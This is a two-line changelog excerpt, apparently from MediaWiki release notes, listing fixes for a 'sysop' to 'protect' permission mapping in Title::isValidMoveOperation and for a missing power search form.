* (bug 14093) Do 'sysop' => 'protect' magic in Title::isValidMoveOperation
* (bug 14063) Power search form missing